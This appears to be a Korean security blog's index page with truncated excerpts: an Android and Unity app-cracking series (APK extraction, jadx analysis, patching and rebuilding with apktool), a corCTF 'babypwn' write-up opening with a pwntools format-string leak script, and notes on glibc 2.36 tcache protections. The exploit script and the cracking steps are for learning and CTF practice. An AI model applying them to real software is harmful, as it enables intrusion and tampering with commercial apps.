보호되어 있는 글입니다.

주제: 리얼 앱 크랙 제작 기간: 22.07.26 ~ 22.09.08 목차 00) adb란? 01) apk 추출 02) 개요 03) 분석 (jadx-gui) 04) 변조 (+추가 분석) 00) adb란? 안드로이드 장치와 통신하여 디버깅 등의 작업을 도와주는 command-line tool 이다. 안드로이드 SDK에도 포함되어있으며 애플리케이션 설치, 디바이스 접속 및 관리, 파일 업/다운로드, 시스템 log 출력, shell 접속 등이 가능하다. 이전 유니티에서의 과정을 통해 NVDIA 사이트에서 SDK (NVPACK)를 설치하였으므로 설치과정은 생략 또한 NOX로 진행하기때문에 따로 adb 설치 없이 nox_adb를 사용해도 무관 01) apk 추출 apk 추출 방법 설명에 앞서 apkpure와 같은..

2022.08.06~ pwn) babypwn - 114 solves 문제설명에 러스트라는 단어가 있어서 겁먹기 딱 좋다. 그치만 사실은 매우 간단한 rtl rop fsb 문제였기 때문에 쉽게 풀렸다. - babypwn.py #!/usr/bin/python3 # MIsutgaRU from pwn import * s = remote("be.ax", 31801) #s = process("./babypwn") pause() payload = b"%p %p %p %p %p" s.sendline(payload) s.recvuntil(b"Hi, ") s.recvuntil(b" ") addr = int(s.recvuntil(b" ")[:-1],16) log.info(hex(addr)) libc = addr + 0x14..

Ubuntu 22.04 (glibc-2.36)까지 업데이트가 되면서 tcache에 관한 취약점들을 보완하기 위해 여러코드가 추가되었다. 참고된 코드는 아래 링크에서 확인할 수 있다. 버전별로 코드가 약간씩 다르지만 가장 최신버전인 2.36으로 분석을 진행하였다. 분석에는 오류가 있을 수 있다. https://github.com/bminor/glibc/blob/glibc-2.36/malloc/malloc.c#L3191 GitHub - bminor/glibc: Unofficial mirror of sourceware glibc repository. Updated daily. Unofficial mirror of sourceware glibc repository. Updated daily. - GitHub -..

Ubuntu 22.04 (glibc-2.36)까지 업데이트가 되면서 tcache에 관한 취약점들을 보완하기 위해 여러코드가 추가되었다. 지난주에 있었던 corCTF의 cshell2문제를 푸는 과정에서, 문제에 사용된 libc가 22.04버전에서 사용되는 libc였기때문에 tcache에 관해 공부를 해야했다. 구글에서는 찾기가 어려워서 직접 코드를 통해 알아보았다. (보호기법 명칭을 알고나니 검색되는 글이 있어서 슬펐다... 어쨌든 삽질은 좋은거야 좋은거) 알아낸 최신 tcache 보호기법을 라이트업에 함께 적으려고하니 너무 길어지기도 했고, 최신 tcache에 대해 정리된 글이 아직 많지 않은것같아서 블로그에 따로 어설프게나마 정리를 해보려고한다. 우선 문제 해결 과정에서 알아낸 것들만 정리해두었는데, ..

주제: 유니티 크랙 제작 기간: 22.07.18 ~ 22.07.25 코드 변조까지 마쳤다면 변조된 코드를 포함하여 재빌드를 해서 apk로 만들어야한다. 디컴파일 때와 마찬가지로 apktool을 사용하였다. apktool b (디컴파일 폴더 경로) –o (저장할경로\저장할이름.apk) 안드로이드 휴대폰에 apk파일을 옮기고 설치한 결과, " 패키지가 잘못되어 앱이 설치되지 않았습니다. " 라는 설치 에러가 발생하였다. 이를 해결하기 위해 여러가지 방법을 시도해보았다. 1. Apktool 디컴파일, dll 변경 후 재빌드 2. dll 안바꾸고 디컴파일 컴파일 3. Signing시도 4. Unzip만 하고 dll변경 후 다시 압축 5. 안드로이드 구버전으로 시도 6. APK Easy Tool 사용 => 설치는..